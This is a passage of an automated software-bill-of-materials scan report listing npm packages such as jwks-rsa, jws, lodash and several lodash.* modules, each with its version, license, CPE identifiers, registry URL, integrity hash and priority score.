id: 0c0a903cc4471d02 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jwks-rsa 3.2.2' + title: jwks-rsa 3.2.2 + description: 'Package discovered: jwks-rsa 3.2.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 014369d0efdc09b2 + name: jwks-rsa + version: 3.2.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jwks-rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jwks-rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jwks_rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jwks_rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jwks:jwks-rsa:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:jwks:jwks_rsa:3.2.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/jwks-rsa@3.2.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jwks-rsa/-/jwks-rsa-3.2.2.tgz + integrity: sha512-BqTyEDV+lS8F2trk3A+qJnxV5Q9EqKCBJOPti3W97r7qTympCZjb7h2X6f2kc+0K3rsSTY1/6YG2eaXKoj497w== + dependencies: + '@types/jsonwebtoken': ^9.0.4 + debug: ^4.3.4 + jose: ^4.15.4 + limiter: ^1.1.5 + lru-memoizer: ^2.2.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5dd04dd82934e4bc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: jws 4.0.1' + title: jws 4.0.1 + description: 'Package discovered: jws 4.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7fed8e7a1bc916bb + name: jws + version: 4.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:jws:jws:4.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/jws@4.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/jws/-/jws-4.0.1.tgz + integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA== + dependencies: + jwa: ^2.0.1 + safe-buffer: ^5.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fdd5e753a1967298 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: leac 0.6.0' + title: leac 0.6.0 + description: 'Package discovered: leac 0.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9ec1624bf944fe34 + name: leac + version: 0.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:leac:leac:0.6.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/leac@0.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/leac/-/leac-0.6.0.tgz + integrity: sha512-y+SqErxb8h7nE/fiEX07jsbuhrpO9lL8eca7/Y1nuWV2moNlXhyd59iDGcRf6moVyDMbmTNzL40SUyrFU/yDpg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 63788a24cb56472a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lilconfig 3.1.3' + title: lilconfig 3.1.3 + description: 'Package discovered: lilconfig 3.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a8f0bd77b399e569 + name: lilconfig + version: 3.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lilconfig:lilconfig:3.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lilconfig@3.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lilconfig/-/lilconfig-3.1.3.tgz + integrity: sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 90dd10f1ec21efdc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: limiter 1.1.5' + title: limiter 1.1.5 + description: 'Package discovered: limiter 1.1.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7ebb3add1191948c + name: limiter + version: 1.1.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:limiter:limiter:1.1.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/limiter@1.1.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/limiter/-/limiter-1.1.5.tgz + integrity: sha512-FWWMIEOxz3GwUI4Ts/IvgVy6LPvoMPgjMdQ185nN6psJyBJ4yOpzqm695/h5umdLJg2vW3GR5iG11MAkR2AzJA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8108350690a84b91 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: linebreak 1.1.0' + title: linebreak 1.1.0 + description: 'Package discovered: linebreak 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 17b9850959841637 + name: linebreak + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:linebreak:linebreak:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/linebreak@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/linebreak/-/linebreak-1.1.0.tgz + integrity: sha512-MHp03UImeVhB7XZtjd0E4n6+3xr5Dq/9xI/5FptGk5FrbDR3zagPa2DS6U8ks/3HjbKWG9Q1M2ufOzxV2qLYSQ== + dependencies: + base64-js: 0.0.8 + unicode-trie: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6d22d8e100269548 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lines-and-columns 1.2.4' + title: lines-and-columns 1.2.4 + description: 'Package discovered: lines-and-columns 1.2.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2f4d4f332c0f6687 + name: lines-and-columns + version: 1.2.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lines-and-columns:lines-and-columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines-and-columns:lines_and_columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines_and_columns:lines-and-columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines_and_columns:lines_and_columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines-and:lines-and-columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines-and:lines_and_columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines_and:lines-and-columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines_and:lines_and_columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines:lines-and-columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:lines:lines_and_columns:1.2.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lines-and-columns@1.2.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz + integrity: sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 99a30188145ce555 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: locate-path 5.0.0' + title: locate-path 5.0.0 + description: 'Package discovered: locate-path 5.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e6b383b17df8c845 + name: locate-path + version: 5.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:locate-path:locate-path:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:locate-path:locate_path:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:locate_path:locate-path:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:locate_path:locate_path:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:locate:locate-path:5.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:locate:locate_path:5.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/locate-path@5.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz + integrity: sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g== + dependencies: + p-locate: ^4.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4752919bcee27237 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash 4.18.1' + title: lodash 4.18.1 + description: 'Package discovered: lodash 4.18.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ac9c211256bf6980 + name: lodash + version: 4.18.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash:lodash:4.18.1:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/lodash@4.18.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz + integrity: sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 89713df98a2beb75 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.camelcase 4.3.0' + title: lodash.camelcase 4.3.0 + description: 'Package discovered: lodash.camelcase 4.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a5b985768ef9b9f6 + name: lodash.camelcase + version: 4.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.camelcase:lodash.camelcase:4.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.camelcase@4.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz + integrity: sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4b1d67018d50050d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.clonedeep 4.5.0' + title: lodash.clonedeep 4.5.0 + description: 'Package discovered: lodash.clonedeep 4.5.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 1fdd3c59e36d5b0f + name: lodash.clonedeep + version: 4.5.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.clonedeep:lodash.clonedeep:4.5.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.clonedeep@4.5.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz + integrity: sha512-H5ZhCF25riFd9uB5UCkVKo61m3S/xZk1x4wA6yp/L3RFP6Z/eHH1ymQcGLo7J3GMPfm0V/7m1tryHuGVxpqEBQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6ee3a377a52860b5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.defaults 4.2.0' + title: lodash.defaults 4.2.0 + description: 'Package discovered: lodash.defaults 4.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 59a8c664dfef6c46 + name: lodash.defaults + version: 4.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.defaults:lodash.defaults:4.2.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.defaults@4.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz + integrity: sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a3b4683fdc629aef + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.includes 4.3.0' + title: lodash.includes 4.3.0 + description: 'Package discovered: lodash.includes 4.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: aa93a44741b08e66 + name: lodash.includes + version: 4.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.includes:lodash.includes:4.3.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.includes@4.3.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz + integrity: sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c512306c360b6fda + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.isarguments 3.1.0' + title: lodash.isarguments 3.1.0 + description: 'Package discovered: lodash.isarguments 3.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c84bded77fb6b828 + name: lodash.isarguments + version: 3.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.isarguments:lodash.isarguments:3.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.isarguments@3.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz + integrity: sha512-chi4NHZlZqZD18a0imDHnZPrDeBbTtVN7GXMwuGdRH9qotxAjYs3aVLKc7zNOG9eddR5Ksd8rvFEBc9SsggPpg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f0317f2d62f56421 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.isboolean 3.0.3' + title: lodash.isboolean 3.0.3 + description: 'Package discovered: lodash.isboolean 3.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: df154b64f7d4588a + name: lodash.isboolean + version: 3.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.isboolean:lodash.isboolean:3.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.isboolean@3.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz + integrity: sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2ae1d391a80c5a72 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.isinteger 4.0.4' + title: lodash.isinteger 4.0.4 + description: 'Package discovered: lodash.isinteger 4.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e92c8ae8d8c83e78 + name: lodash.isinteger + version: 4.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.isinteger:lodash.isinteger:4.0.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.isinteger@4.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz + integrity: sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0e12d10e43707e74 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.isnumber 3.0.3' + title: lodash.isnumber 3.0.3 + description: 'Package discovered: lodash.isnumber 3.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 32689628126e866e + name: lodash.isnumber + version: 3.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:lodash.isnumber:lodash.isnumber:3.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/lodash.isnumber@3.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz + integrity: sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f1231b7e60dd673c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: lodash.isplainobject 4.0.6' + title: lodash.isplainobject 4.0.6 + description: 'Package discovered: lodash.isplainobject 4.0.6' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a6b14f73240e0d01 + name: lodash.isplainobject + version: 4.0.6 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: 